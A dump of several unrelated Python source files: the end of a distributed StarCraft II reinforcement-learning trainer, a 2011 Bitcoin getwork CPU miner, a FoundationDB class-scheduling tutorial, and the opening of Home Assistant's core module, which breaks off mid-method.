flags.DEFINE_string("restore_to", "source", "mini (for Thought-Game) or source (for Real game)")
flags.DEFINE_bool("load_latest", False, "Load latest or bestest model, default is False")
flags.DEFINE_integer("parallel", 10, "How many processes to run in parallel.")
flags.DEFINE_integer("thread_num", 5, "How many thread to run in the process.")
flags.DEFINE_integer("port_num", 12770, "the start port to create distribute tf")
flags.DEFINE_integer("max_iters", 100, "the rl agent max run iters")
flags.DEFINE_string("game_version", None, "game version of SC2")
flags.DEFINE_bool("freeze_head", False, "Whether freeze_head train agents.")
flags.DEFINE_bool("use_bn", False, "Whether use batch_norm to training.")
flags.DEFINE_bool("use_sep_net", False, "Whether use seperate network for policy and value model.")
flags.DEFINE_integer("ob_space_add", 4, "Add state space from thought game.")
flags.DEFINE_integer("act_space_add", 5, "Add action space from thought game.")
flags.DEFINE_bool("add_image", False, "Whether add image for input.")
flags.DEFINE_bool("partial_restore", True, "Whether use partial_restore, default is True.")
flags.DEFINE_string("weighted_sum_type", "AddWeight", "add weighted sum type: Add, AddWeight, AdaptiveWeight, AttentionWeight, default is AddWeight")
flags.DEFINE_string("initial_type", "original", "weight initial type: original, normal, xavier, he, zero, default is original")
FLAGS(sys.argv)
# set the play map: copy per-map coordinates from lib.config into C's globals
play_map = C.get_map_class('lib.config.' + FLAGS.map)
C.my_sub_pos = play_map.my_sub_pos
C.enemy_sub_pos = play_map.enemy_sub_pos
C.enemy_main_pos = play_map.enemy_main_pos
C.base_camera_pos = play_map.base_camera_pos
# Debug/local runs are forced down to a single worker process and thread.
if not FLAGS.on_server or FLAGS.debug_mode:
    PARALLEL = 1
    THREAD_NUM = 1
    MAX_AGENT_STEPS = 18000
    DEVICE = ['/gpu:0']
    NUM_FOR_UPDATE = 1
    TRAIN_ITERS = 1
    PORT_NUM = FLAGS.port_num
else:
    PARALLEL = FLAGS.parallel
    THREAD_NUM = FLAGS.thread_num
    MAX_AGENT_STEPS = FLAGS.max_agent_steps
    # CUDA_VISIBLE_DEVICES == '-1' means CPU-only
    if USED_DEVICES == '-1':
        DEVICE = ['/cpu:0']
    else:
        DEVICE = ['/gpu:' + str(dev) for dev in range(len(FLAGS.device.split(',')))]
    NUM_FOR_UPDATE = FLAGS.num_for_update
    TRAIN_ITERS = FLAGS.max_iters
    PORT_NUM = FLAGS.port_num
LOG = FLAGS.log_path
if not os.path.exists(LOG):
    os.makedirs(LOG)
# distributed-TF cluster spec, filled in by _main
SERVER_DICT = {"worker": [], "ps": []}
# define some global variables shared by the worker threads in each process
UPDATE_EVENT, ROLLING_EVENT = threading.Event(), threading.Event()
Counter = 0
Waiting_Counter = 0
Update_Counter = 0
Result_List = []
'''
ps -ef |grep liuruoze | grep 'SC2_x64' | awk '{print $2}' | xargs kill -9
kill -9 `ps -ef |grep liuruoze | grep eval_mini_srcgame_add_map_bn | awk '{print $2}' `
'''
def run_thread(agent, game_num, Synchronizer, difficulty):
    """Thread body: play SC2 episodes and coordinate network updates.

    agent: the MiniSourceAgent driven by this thread; game_num: episodes this
    thread must contribute per update; Synchronizer: cross-process barrier
    shared with the parameter server; difficulty: built-in bot strength.
    Thread index 0 performs the actual network update while the other threads
    block on the shared UPDATE/ROLLING events.
    """
    global UPDATE_EVENT, ROLLING_EVENT, Counter, Waiting_Counter, Update_Counter, Result_List
    num = 0      # episodes since the last update
    all_num = 0  # episodes played by this thread in total
    proc_name = mp.current_process().name
    C._FPS = 22.4 / FLAGS.step_mul  # 5.6
    step_mul = FLAGS.step_mul  # 4
    C.difficulty = difficulty
    with sc2_env.SC2Env(
            map_name=FLAGS.map,
            agent_race=FLAGS.agent_race,
            bot_race=FLAGS.bot_race,
            difficulty=difficulty,
            step_mul=step_mul,
            score_index=-1,
            game_steps_per_episode=MAX_AGENT_STEPS,
            screen_size_px=(FLAGS.screen_resolution, FLAGS.screen_resolution),
            minimap_size_px=(FLAGS.minimap_resolution, FLAGS.minimap_resolution),
            visualize=False,
            game_version=FLAGS.game_version) as env:
        # env = available_actions_printer.AvailableActionsPrinter(env)
        agent.set_env(env)
        while all_num != game_num * TRAIN_ITERS:
            agent.play_right_add(verbose=FLAGS.debug_mode)
            if FLAGS.training:
                # check if the num of episodes is enough to update
                num += 1
                all_num += 1
                reward = agent.result['reward']
                Counter += 1
                Result_List.append(reward)
                logging("(diff: %d) %d epoch: %s get %d/%d episodes! return: %d!" %
                        (int(difficulty), Update_Counter, proc_name, len(Result_List), game_num * THREAD_NUM, reward))
                # time for update
                if num == game_num:
                    num = 0
                    ROLLING_EVENT.clear()
                    # worker stops rolling, wait for update
                    if agent.index != 0 and THREAD_NUM > 1:
                        Waiting_Counter += 1
                        if Waiting_Counter == THREAD_NUM - 1:  # wait for all the workers stop
                            UPDATE_EVENT.set()
                        ROLLING_EVENT.wait()
                    # update!
                    else:
                        if THREAD_NUM > 1:
                            UPDATE_EVENT.wait()
                        Synchronizer.wait()  # wait for other processes to update
                        agent.update_network(Result_List)
                        Result_List.clear()
                        agent.global_buffer.reset()
                        Synchronizer.wait()
                        Update_Counter += 1
                        # finish update
                        UPDATE_EVENT.clear()
                        Waiting_Counter = 0
                        ROLLING_EVENT.set()
            if FLAGS.save_replay:
                env.save_replay(FLAGS.replay_dir)
            agent.reset()
def Worker(index, update_game_num, Synchronizer, cluster, model_path, log_path):
    """One training process: a distributed-TF worker hosting THREAD_NUM agents
    that share one network and replay buffer.

    index: worker task index in the TF cluster; update_game_num: episodes the
    whole process must contribute per update (split across threads);
    Synchronizer: cross-process barrier shared with the parameter server.
    """
    config = tf.ConfigProto(
        allow_soft_placement=True, log_device_placement=False,
    )
    config.gpu_options.allow_growth = True
    worker = tf.train.Server(cluster, job_name="worker", task_index=index, config=config)
    sess = tf.Session(target=worker.target, config=config)
    summary_writer = tf.summary.FileWriter(log_path)
    Net = MiniNetwork(sess=sess, summary_writer=summary_writer, rl_training=FLAGS.training,
                      cluster=cluster, index=index, device=DEVICE[index % len(DEVICE)],
                      ppo_load_path=FLAGS.restore_model_path, ppo_save_path=model_path,
                      ob_space_add=FLAGS.ob_space_add, act_space_add=FLAGS.act_space_add,
                      freeze_head=FLAGS.freeze_head, use_bn=FLAGS.use_bn,
                      use_sep_net=FLAGS.use_sep_net, restore_model=FLAGS.restore_model,
                      restore_from=FLAGS.restore_from, restore_to=FLAGS.restore_to,
                      load_latest=FLAGS.load_latest, add_image=FLAGS.add_image, partial_restore=FLAGS.partial_restore,
                      weighted_sum_type=FLAGS.weighted_sum_type, initial_type=FLAGS.initial_type)
    global_buffer = Buffer()
    agents = []
    for i in range(THREAD_NUM):
        agent = mini_source_agent.MiniSourceAgent(index=i, global_buffer=global_buffer, net=Net,
                                                  restore_model=FLAGS.restore_model, rl_training=FLAGS.training,
                                                  strategy_agent=None, ob_space_add=FLAGS.ob_space_add)
        agents.append(agent)
    print("Worker %d: waiting for cluster connection..." % index)
    sess.run(tf.report_uninitialized_variables())
    print("Worker %d: cluster ready!" % index)
    # Block until the parameter server has initialized every variable.
    while len(sess.run(tf.report_uninitialized_variables())):
        print("Worker %d: waiting for variable initialization..." % index)
        time.sleep(1)
    print("Worker %d: variables initialized" % index)
    # BUG FIX: was np.ceil(update_game_num // THREAD_NUM) -- integer floor
    # division before ceil made the ceil a no-op and under-counted episodes
    # when update_game_num is not divisible by THREAD_NUM.  Use true division,
    # matching np.ceil(UPDATE_GAME_NUM / PARALLEL) in _main.
    game_num = np.ceil(update_game_num / THREAD_NUM)
    UPDATE_EVENT.clear()
    ROLLING_EVENT.set()
    # Run THREAD_NUM-1 daemon threads; the main thread drives the last agent.
    threads = []
    for i in range(THREAD_NUM - 1):
        t = threading.Thread(target=run_thread, args=(agents[i], game_num, Synchronizer, FLAGS.difficulty))
        threads.append(t)
        t.daemon = True
        t.start()
        time.sleep(3)
    run_thread(agents[-1], game_num, Synchronizer, FLAGS.difficulty)
    for t in threads:
        t.join()
def Parameter_Server(Synchronizer, cluster, log_path, model_path, procs):
    """Parameter-server process: initializes variables, coordinates the
    workers' update barriers, logs win rate and checkpoints the best model.

    Returns (max_win_rate, latest_win_rate) after TRAIN_ITERS updates.
    """
    config = tf.ConfigProto(
        allow_soft_placement=True, log_device_placement=False,
    )
    config.gpu_options.allow_growth = True
    server = tf.train.Server(cluster, job_name="ps", task_index=0, config=config)
    sess = tf.Session(target=server.target, config=config)
    summary_writer = tf.summary.FileWriter(log_path)
    Net = MiniNetwork(sess=sess, summary_writer=summary_writer, rl_training=FLAGS.training,
                      cluster=cluster, index=0, device=DEVICE[0 % len(DEVICE)],
                      ppo_load_path=FLAGS.restore_model_path, ppo_save_path=model_path,
                      ob_space_add=FLAGS.ob_space_add, act_space_add=FLAGS.act_space_add,
                      freeze_head=FLAGS.freeze_head, use_bn=FLAGS.use_bn,
                      use_sep_net=FLAGS.use_sep_net,
                      restore_model=FLAGS.restore_model,
                      restore_from=FLAGS.restore_from, restore_to=FLAGS.restore_to,
                      load_latest=FLAGS.load_latest, add_image=FLAGS.add_image, partial_restore=FLAGS.partial_restore,
                      weighted_sum_type=FLAGS.weighted_sum_type, initial_type=FLAGS.initial_type)
    # index -1 marks the evaluation/summary agent owned by the PS process
    agent = mini_source_agent.MiniSourceAgent(index=-1, net=Net, restore_model=FLAGS.restore_model,
                                              rl_training=FLAGS.training, ob_space_add=FLAGS.ob_space_add)
    print("Parameter server: waiting for cluster connection...")
    sess.run(tf.report_uninitialized_variables())
    print("Parameter server: cluster ready!")
    print("Parameter server: initializing variables...")
    agent.init_network()
    print("Parameter server: variables initialized")
    update_counter = 0
    max_win_rate = 0.
    latest_win_rate = 0.
    while update_counter < TRAIN_ITERS:
        agent.reset_old_network()
        # wait for the workers to finish collecting episodes
        Synchronizer.wait()
        logging("Update Network!")
        # TODO count the time , compare cpu and gpu
        time.sleep(1)
        # update finished on the workers
        Synchronizer.wait()
        logging("Update Network finished!")
        steps, win_rate = agent.update_summary(update_counter)
        logging("Steps: %d, win rate: %f" % (steps, win_rate))
        update_counter += 1
        # checkpoint whenever the win rate ties or beats the best so far
        if win_rate >= max_win_rate:
            agent.save_model()
            max_win_rate = win_rate
        latest_win_rate = win_rate
        agent.net.save_latest_policy()
    return max_win_rate, latest_win_rate
def _main(unused_argv):
    """Entry point: build the distributed-TF cluster spec, spawn PARALLEL
    worker processes, then run the parameter server in this process."""
    # create distribute tf cluster: one ps at start_port, workers right after
    start_port = PORT_NUM
    SERVER_DICT["ps"].append("localhost:%d" % start_port)
    for i in range(PARALLEL):
        SERVER_DICT["worker"].append("localhost:%d" % (start_port + 1 + i))
    Cluster = tf.train.ClusterSpec(SERVER_DICT)
    now = datetime.now()
    model_path = "./model/" + now.strftime("%Y%m%d-%H%M%S") + "_source/"
    if not os.path.exists(model_path):
        os.makedirs(model_path)
    log_path = "./logs/" + now.strftime("%Y%m%d-%H%M%S") + "_source/"
    UPDATE_GAME_NUM = NUM_FOR_UPDATE
    # episodes each worker process must contribute per network update
    per_update_num = np.ceil(UPDATE_GAME_NUM / PARALLEL)
    # +1: the parameter server also joins both barriers
    Synchronizer = mp.Barrier(PARALLEL + 1)
    # Run parallel worker processes (daemonized; staggered starts)
    procs = []
    for index in range(PARALLEL):
        p = mp.Process(name="Worker_%d" % index, target=Worker, args=(index, per_update_num, Synchronizer, Cluster, model_path, log_path))
        procs.append(p)
        p.daemon = True
        p.start()
        time.sleep(1)
    max_win_rate, latest_win_rate = Parameter_Server(Synchronizer, Cluster, log_path, model_path, procs)
    print('#######################')
    print('Best Win_rate:', max_win_rate)
    print('Latest Win_rate:', latest_win_rate)
    print('#######################')
    for p in procs:
        p.join()
'''
if FLAGS.profile:
print(stopwatch.sw)
'''
if __name__ == "__main__":
    # absl's app.run parses remaining flags and dispatches to _main(argv)
    app.run(_main)
|
pyminer.py | #!/usr/bin/python
#
# Copyright (c) 2011 The Bitcoin developers
# Distributed under the MIT/X11 software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
import time
import json
import pprint
import hashlib
import struct
import re
import base64
import httplib
import sys
from multiprocessing import Process
ERR_SLEEP = 15          # seconds to back off after a failed/bad RPC getwork
MAX_NONCE = 1000000L    # initial per-getwork nonce scan budget (Python 2 long)
settings = {}           # key=value pairs read from the config file in __main__
pp = pprint.PrettyPrinter(indent=4)
class BitcoinRPC:
    """Minimal JSON-RPC 1.1 client for a local bitcoind (Python 2)."""
    OBJID = 1  # request id counter; becomes an instance attribute on first +=

    def __init__(self, host, port, username, password):
        # HTTP Basic auth header; single keep-alive connection, 30 s timeout
        authpair = "%s:%s" % (username, password)
        self.authhdr = "Basic %s" % (base64.b64encode(authpair))
        self.conn = httplib.HTTPConnection(host, port, False, 30)

    def rpc(self, method, params=None):
        """POST one JSON-RPC call; return the 'result' field, the 'error'
        object on RPC-level error, or None on transport/decode failure."""
        self.OBJID += 1
        obj = { 'version' : '1.1',
                'method' : method,
                'id' : self.OBJID }
        if params is None:
            obj['params'] = []
        else:
            obj['params'] = params
        self.conn.request('POST', '/', json.dumps(obj),
                          { 'Authorization' : self.authhdr,
                            'Content-type' : 'application/json' })
        resp = self.conn.getresponse()
        if resp is None:
            print "JSON-RPC: no response"
            return None
        body = resp.read()
        resp_obj = json.loads(body)
        if resp_obj is None:
            print "JSON-RPC: cannot JSON-decode body"
            return None
        if 'error' in resp_obj and resp_obj['error'] != None:
            return resp_obj['error']
        if 'result' not in resp_obj:
            print "JSON-RPC: no result in object"
            return None
        return resp_obj['result']

    def getblockcount(self):
        # convenience wrapper for the 'getblockcount' RPC
        return self.rpc('getblockcount')

    def getwork(self, data=None):
        # with data: submit a solved block; without: fetch new work
        return self.rpc('getwork', data)
def uint32(x):
    """Truncate *x* to an unsigned 32-bit value.

    The mask literal is written without the Python-2-only ``L`` suffix: the
    numeric result is identical and the helper stays valid under both
    Python 2 and Python 3.
    """
    return x & 0xffffffff
def bytereverse(x):
    """Return the 32-bit word *x* with its four bytes in reverse order."""
    # Move byte 0 -> 3, 1 -> 2, 2 -> 1, 3 -> 0, then clamp to 32 bits.
    swapped = (x << 24) \
            | ((x << 8) & 0x00ff0000) \
            | ((x >> 8) & 0x0000ff00) \
            | (x >> 24)
    return uint32(swapped)
def bufreverse(in_buf):
    # Byte-swap every 32-bit word of in_buf (a Python-2 byte string whose
    # length is assumed to be a multiple of 4) and return the rebuilt string.
    out_words = []
    for i in range(0, len(in_buf), 4):
        # '@I' = native byte order, unsigned 32-bit word
        word = struct.unpack('@I', in_buf[i:i+4])[0]
        out_words.append(struct.pack('@I', bytereverse(word)))
    return ''.join(out_words)
def wordreverse(in_buf):
    """Reverse the order of the 4-byte words in *in_buf*; byte order within
    each word is left untouched."""
    words = [in_buf[i:i + 4] for i in range(0, len(in_buf), 4)]
    return ''.join(reversed(words))
class Miner:
    """One mining worker: fetches getwork jobs, scans a nonce range with
    double-SHA256 and submits any solution that beats the target (Python 2)."""

    def __init__(self, id):
        self.id = id
        # per-getwork nonce scan budget; re-tuned after every scan so that one
        # pass takes roughly settings['scantime'] seconds
        self.max_nonce = MAX_NONCE

    def work(self, datastr, targetstr):
        """Scan nonces for one getwork job.

        datastr: 256 hex chars of block data; targetstr: 64 hex chars target.
        Returns (hashes_done, nonce_bin): nonce_bin is the packed winning
        nonce, or None when the range was exhausted without a solution.
        """
        # decode work data hex string to binary
        static_data = datastr.decode('hex')
        static_data = bufreverse(static_data)
        # the first 76b of 80b do not change
        blk_hdr = static_data[:76]
        # decode 256-bit target value
        targetbin = targetstr.decode('hex')
        targetbin = targetbin[::-1]	# byte-swap and dword-swap
        targetbin_str = targetbin.encode('hex')
        target = long(targetbin_str, 16)
        # pre-hash first 76b of block header (shared by every nonce)
        static_hash = hashlib.sha256()
        static_hash.update(blk_hdr)
        for nonce in xrange(self.max_nonce):
            # encode 32-bit nonce value
            nonce_bin = struct.pack("<I", nonce)
            # hash final 4b, the nonce value
            hash1_o = static_hash.copy()
            hash1_o.update(nonce_bin)
            hash1 = hash1_o.digest()
            # sha256 hash of sha256 hash
            hash_o = hashlib.sha256()
            hash_o.update(hash1)
            hash = hash_o.digest()
            # quick test for winning solution: high 32 bits zero?
            if hash[-4:] != '\0\0\0\0':
                continue
            # convert binary hash to 256-bit Python long
            hash = bufreverse(hash)
            hash = wordreverse(hash)
            hash_str = hash.encode('hex')
            l = long(hash_str, 16)
            # proof-of-work test: hash < target
            if l < target:
                print time.asctime(), "PROOF-OF-WORK found: %064x" % (l,)
                return (nonce + 1, nonce_bin)
            else:
                print time.asctime(), "PROOF-OF-WORK false positive %064x" % (l,)
                # return (nonce + 1, nonce_bin)
        # nonce range exhausted without a winner
        return (nonce + 1, None)

    def submit_work(self, rpc, original_data, nonce_bin):
        # splice the solved nonce back into the original hex work data
        nonce_bin = bufreverse(nonce_bin)
        nonce = nonce_bin.encode('hex')
        solution = original_data[:152] + nonce + original_data[160:256]
        param_arr = [ solution ]
        result = rpc.getwork(param_arr)
        print time.asctime(), "--> Upstream RPC result:", result

    def iterate(self, rpc):
        # one fetch/scan/submit cycle; back off ERR_SLEEP on missing/bad work
        work = rpc.getwork()
        if work is None:
            time.sleep(ERR_SLEEP)
            return
        if 'data' not in work or 'target' not in work:
            time.sleep(ERR_SLEEP)
            return
        time_start = time.time()
        (hashes_done, nonce_bin) = self.work(work['data'],
                                             work['target'])
        time_end = time.time()
        time_diff = time_end - time_start
        # retune the scan range so the next pass lasts ~scantime seconds
        self.max_nonce = long(
            (hashes_done * settings['scantime']) / time_diff)
        if self.max_nonce > 0xfffffffaL:
            self.max_nonce = 0xfffffffaL
        if settings['hashmeter']:
            print "HashMeter(%d): %d hashes, %.2f Khash/sec" % (
                  self.id, hashes_done,
                  (hashes_done / 1000.0) / time_diff)
        if nonce_bin is not None:
            self.submit_work(rpc, work['data'], nonce_bin)

    def loop(self):
        # connect once, then mine until the process is killed
        rpc = BitcoinRPC(settings['host'], settings['port'],
                         settings['rpcuser'], settings['rpcpass'])
        if rpc is None:
            return
        while True:
            self.iterate(rpc)
def miner_thread(id):
    """Process entry point: run one Miner's fetch/scan/submit loop forever."""
    Miner(id).loop()
if __name__ == '__main__':
    if len(sys.argv) != 2:
        print "Usage: pyminer.py CONFIG-FILE"
        sys.exit(1)
    # parse the key=value config file, skipping comment lines
    f = open(sys.argv[1])
    for line in f:
        # skip comment lines
        m = re.search('^\s*#', line)
        if m:
            continue
        # parse key=value lines
        m = re.search('^(\w+)\s*=\s*(\S.*)$', line)
        if m is None:
            continue
        settings[m.group(1)] = m.group(2)
    f.close()
    # fill in defaults for anything the config file omitted
    if 'host' not in settings:
        settings['host'] = '127.0.0.1'
    if 'port' not in settings:
        settings['port'] = 36894
    if 'threads' not in settings:
        settings['threads'] = 1
    if 'hashmeter' not in settings:
        settings['hashmeter'] = 0
    if 'scantime' not in settings:
        settings['scantime'] = 30L
    if 'rpcuser' not in settings or 'rpcpass' not in settings:
        print "Missing username and/or password in cfg file"
        sys.exit(1)
    # config values arrive as strings; coerce the numeric ones
    settings['port'] = int(settings['port'])
    settings['threads'] = int(settings['threads'])
    settings['hashmeter'] = int(settings['hashmeter'])
    settings['scantime'] = long(settings['scantime'])
    # one OS process per mining "thread"
    thr_list = []
    for thr_id in range(settings['threads']):
        p = Process(target=miner_thread, args=(thr_id,))
        p.start()
        thr_list.append(p)
        time.sleep(1)			# stagger threads
    print settings['threads'], "mining threads started"
    print time.asctime(), "Miner Starts - %s:%s" % (settings['host'], settings['port'])
    try:
        for thr_proc in thr_list:
            thr_proc.join()
    except KeyboardInterrupt:
        pass
    print time.asctime(), "Miner Stops - %s:%s" % (settings['host'], settings['port'])
|
SchedulingTutorial.py | import itertools
import traceback
import fdb
import fdb.tuple
# Select the FDB client API version; must precede any other fdb call.
fdb.api_version(520)
####################################
##        Initialization          ##
####################################
# Data model:
# ('attends', student, class) = ''
# ('class', class_name) = seats_left
db = fdb.open()
# All tutorial keys live under the 'scheduling' directory prefix.
scheduling = fdb.directory.create_or_open(db, ('scheduling',))
course = scheduling['class']    # ('class', name) -> packed seats_left
attends = scheduling['attends'] # ('attends', student, name) -> ''
@fdb.transactional
def add_class(tr, c):
    # Create (or reset) class c with 100 open seats, stored as a packed tuple.
    tr[course.pack((c,))] = fdb.tuple.pack((100,))
# Generate 1,620 classes like '9:00 chem for dummies'
# (18 time slots x 10 subjects x 9 levels)
levels = ['intro', 'for dummies', 'remedial', '101',
          '201', '301', 'mastery', 'lab', 'seminar']
types = ['chem', 'bio', 'cs', 'geometry', 'calc',
         'alg', 'film', 'music', 'art', 'dance']
times = [str(h) + ':00' for h in range(2, 20)]
class_combos = itertools.product(times, types, levels)
class_names = [' '.join(tup) for tup in class_combos]
@fdb.transactional
def init(tr):
    # Wipe everything under the 'scheduling' directory, then recreate every
    # class with a full complement of seats -- all in one transaction.
    del tr[scheduling.range(())] # Clear the directory
    for class_name in class_names:
        add_class(tr, class_name)
####################################
## Class Scheduling Functions ##
####################################
@fdb.transactional
def available_classes(tr):
    # All class names whose seats_left counter is still non-zero.
    return [course.unpack(k)[0] for k, v in tr[course.range(())]
            if fdb.tuple.unpack(v)[0]]
@fdb.transactional
def signup(tr, s, c):
    """Enroll student s in class c (no-op if already enrolled).

    Raises when the class is full or the student already has 5 classes.
    The seat decrement and the attendance record commit (or retry) together
    because everything runs in one transaction.
    """
    rec = attends.pack((s, c))
    if tr[rec].present(): return # already signed up
    seats_left = fdb.tuple.unpack(tr[course.pack((c,))])[0]
    if not seats_left: raise Exception('No remaining seats')
    classes = tr[attends.range((s,))]
    if len(list(classes)) == 5: raise Exception('Too many classes')
    tr[course.pack((c,))] = fdb.tuple.pack((seats_left - 1,))
    tr[rec] = b''
@fdb.transactional
def drop(tr, s, c):
    """Remove student *s* from class *c*; no-op if not enrolled."""
    rec = attends.pack((s, c))
    if not tr[rec].present():
        return  # not taking this class
    # Give the seat back, then delete the enrollment record.
    tr[course.pack((c,))] = fdb.tuple.pack((fdb.tuple.unpack(tr[course.pack((c,))])[0] + 1,))
    del tr[rec]
@fdb.transactional
def switch(tr, s, old_c, new_c):
    """Atomically move student *s* from *old_c* to *new_c* (single transaction)."""
    drop(tr, s, old_c)
    signup(tr, s, new_c)
####################################
## Testing ##
####################################
import random
import threading
def indecisive_student(i, ops):
    """Simulate one student doing *ops* random add/drop/switch transactions.

    i:   student index, used only to build the student ID ('s0', 's1', ...).
    ops: number of operations to attempt against the database.

    Keeps a local cache of available classes; on any transaction failure the
    cache is invalidated and refreshed on the next iteration.
    """
    student_ID = 's{:d}'.format(i)
    all_classes = class_names
    my_classes = []
    # Fix: the original used 'for i in range(ops)', shadowing the parameter.
    for _ in range(ops):
        class_count = len(my_classes)
        # Pick a random action that is valid for the current enrollment count.
        moods = []
        if class_count:
            moods.extend(['drop', 'switch'])
        if class_count < 5:
            moods.append('add')
        mood = random.choice(moods)
        try:
            if not all_classes:
                all_classes = available_classes(db)
            if mood == 'add':
                c = random.choice(all_classes)
                signup(db, student_ID, c)
                my_classes.append(c)
            elif mood == 'drop':
                c = random.choice(my_classes)
                drop(db, student_ID, c)
                my_classes.remove(c)
            elif mood == 'switch':
                old_c = random.choice(my_classes)
                new_c = random.choice(all_classes)
                switch(db, student_ID, old_c, new_c)
                my_classes.remove(old_c)
                my_classes.append(new_c)
        except Exception:
            # Intentionally broad: a full class, a full schedule, or any FDB
            # error simply forces a refresh of the cached class list.
            traceback.print_exc()
            print("Need to recheck available classes.")
            all_classes = []
def run(students, ops_per_student):
    """Launch one thread per student, wait for all of them, report the total."""
    workers = []
    for idx in range(students):
        workers.append(threading.Thread(
            target=indecisive_student, args=(idx, ops_per_student)))
    for worker in workers:
        worker.start()
    for worker in workers:
        worker.join()
    print("Ran {} transactions".format(students * ops_per_student))
if __name__ == "__main__":
    # Populate the catalog, then simulate 10 students x 10 operations each.
    init(db)
    print("initialized")
    run(10, 10)
|
core.py | """
Core components of Home Assistant.
Home Assistant is a Home Automation framework for observing the state
of entities and react to changes.
"""
# pylint: disable=unused-import, too-many-lines
import asyncio
from concurrent.futures import ThreadPoolExecutor
import enum
import functools as ft
import logging
import os
import re
import signal
import sys
import threading
import time
from types import MappingProxyType
from typing import Optional, Any, Callable, List # NOQA
import voluptuous as vol
from voluptuous.humanize import humanize_error
from homeassistant.const import (
ATTR_DOMAIN, ATTR_FRIENDLY_NAME, ATTR_NOW, ATTR_SERVICE,
ATTR_SERVICE_CALL_ID, ATTR_SERVICE_DATA, EVENT_CALL_SERVICE,
EVENT_HOMEASSISTANT_START, EVENT_HOMEASSISTANT_STOP,
EVENT_SERVICE_EXECUTED, EVENT_SERVICE_REGISTERED, EVENT_STATE_CHANGED,
EVENT_TIME_CHANGED, MATCH_ALL, RESTART_EXIT_CODE,
SERVICE_HOMEASSISTANT_RESTART, SERVICE_HOMEASSISTANT_STOP, __version__)
from homeassistant.exceptions import (
HomeAssistantError, InvalidEntityFormatError)
from homeassistant.util.async import (
run_coroutine_threadsafe, run_callback_threadsafe)
import homeassistant.util as util
import homeassistant.util.dt as dt_util
import homeassistant.util.location as location
from homeassistant.util.unit_system import UnitSystem, METRIC_SYSTEM # NOQA
try:
import uvloop
asyncio.set_event_loop_policy(uvloop.EventLoopPolicy())
except ImportError:
pass
# Domain used for core services (homeassistant.stop / restart).
DOMAIN = "homeassistant"

# How often time_changed event should fire
TIMER_INTERVAL = 1  # seconds

# How long we wait for the result of a service call
SERVICE_CALL_LIMIT = 10  # seconds

# Define number of MINIMUM worker threads.
# During bootstrap of HA (see bootstrap._setup_component()) worker threads
# will be added for each component that polls devices.
MIN_WORKER_THREAD = 2

# Pattern for validating entity IDs (format: <domain>.<entity>)
ENTITY_ID_PATTERN = re.compile(r"^(\w+)\.(\w+)$")

# Interval at which we check if the pool is getting busy
MONITOR_POOL_INTERVAL = 30

_LOGGER = logging.getLogger(__name__)
def split_entity_id(entity_id: str) -> List[str]:
    """Split an entity_id of the form '<domain>.<object_id>' into its parts."""
    parts = entity_id.split(".", maxsplit=1)
    return parts
def valid_entity_id(entity_id: str) -> bool:
    """Return True if *entity_id* matches the '<domain>.<object_id>' format."""
    return bool(ENTITY_ID_PATTERN.match(entity_id))
def callback(func: Callable[..., None]) -> Callable[..., None]:
    """Mark *func* as safe to run inside the event loop and return it."""
    # The marker attribute is what is_callback() checks for.
    setattr(func, '_hass_callback', True)
    return func
def is_callback(func: Callable[..., Any]) -> bool:
    """Return True if *func* was marked with the @callback decorator."""
    # Checks the function's own __dict__ only (not inherited attributes).
    return '_hass_callback' in vars(func)
class CoreState(enum.Enum):
    """Represent the current state of Home Assistant."""

    # Lifecycle: not_running -> starting -> running -> stopping -> not_running
    not_running = "NOT_RUNNING"
    starting = "STARTING"
    running = "RUNNING"
    stopping = "STOPPING"

    def __str__(self) -> str:
        """Return the string value of the state."""
        return self.value
class JobPriority(util.OrderedEnum):
    """Provides job priorities for event bus jobs (lower value = higher priority)."""

    EVENT_CALLBACK = 0
    EVENT_SERVICE = 1
    EVENT_STATE = 2
    EVENT_TIME = 3
    EVENT_DEFAULT = 4

    @staticmethod
    def from_event_type(event_type):
        """Return the priority that corresponds to *event_type*."""
        priorities = {
            EVENT_TIME_CHANGED: JobPriority.EVENT_TIME,
            EVENT_STATE_CHANGED: JobPriority.EVENT_STATE,
            EVENT_CALL_SERVICE: JobPriority.EVENT_SERVICE,
            EVENT_SERVICE_EXECUTED: JobPriority.EVENT_CALLBACK,
        }
        return priorities.get(event_type, JobPriority.EVENT_DEFAULT)
class HomeAssistant(object):
    """Root object of the Home Assistant home automation.

    Owns the asyncio event loop, the legacy worker pool, the event bus,
    the service registry and the state machine.
    """

    # pylint: disable=too-many-instance-attributes
    def __init__(self, loop=None):
        """Initialize new Home Assistant object."""
        self.loop = loop or asyncio.get_event_loop()
        # Executor backing loop.run_in_executor() calls.
        self.executor = ThreadPoolExecutor(max_workers=5)
        self.loop.set_default_executor(self.executor)
        # Worker pool for synchronous (non-coroutine, non-callback) jobs.
        self.pool = pool = create_worker_pool()
        self.bus = EventBus(pool, self.loop)
        self.services = ServiceRegistry(self.bus, self.add_job, self.loop)
        self.states = StateMachine(self.bus, self.loop)
        self.config = Config()  # type: Config
        self.state = CoreState.not_running
        # Exit code handed back to the launcher; RESTART_EXIT_CODE on restart.
        self.exit_code = None

    @property
    def is_running(self) -> bool:
        """Return if Home Assistant is running."""
        return self.state in (CoreState.starting, CoreState.running)

    def start(self) -> None:
        """Start home assistant and block until the loop is stopped."""
        _LOGGER.info(
            "Starting Home Assistant (%d threads)", self.pool.worker_count)
        self.state = CoreState.starting

        # Register the async start
        self.loop.create_task(self.async_start())

        def stop_homeassistant(*args):
            """Stop Home Assistant."""
            self.exit_code = 0
            self.async_add_job(self.async_stop)

        def restart_homeassistant(*args):
            """Restart Home Assistant."""
            self.exit_code = RESTART_EXIT_CODE
            self.async_add_job(self.async_stop)

        # Register the restart/stop event
        self.loop.call_soon(
            self.services.async_register,
            DOMAIN, SERVICE_HOMEASSISTANT_STOP, stop_homeassistant
        )
        self.loop.call_soon(
            self.services.async_register,
            DOMAIN, SERVICE_HOMEASSISTANT_RESTART, restart_homeassistant
        )

        # Setup signal handling (POSIX only; not supported on Windows loops)
        if sys.platform != 'win32':
            try:
                self.loop.add_signal_handler(
                    signal.SIGTERM,
                    stop_homeassistant
                )
            except ValueError:
                _LOGGER.warning('Could not bind to SIGTERM.')
            try:
                self.loop.add_signal_handler(
                    signal.SIGHUP,
                    restart_homeassistant
                )
            except ValueError:
                _LOGGER.warning('Could not bind to SIGHUP.')

        # Run forever and catch keyboard interrupt
        try:
            # Block until stopped
            _LOGGER.info("Starting Home Assistant core loop")
            self.loop.run_forever()
        except KeyboardInterrupt:
            # Schedule a clean shutdown, then run the loop until it finishes.
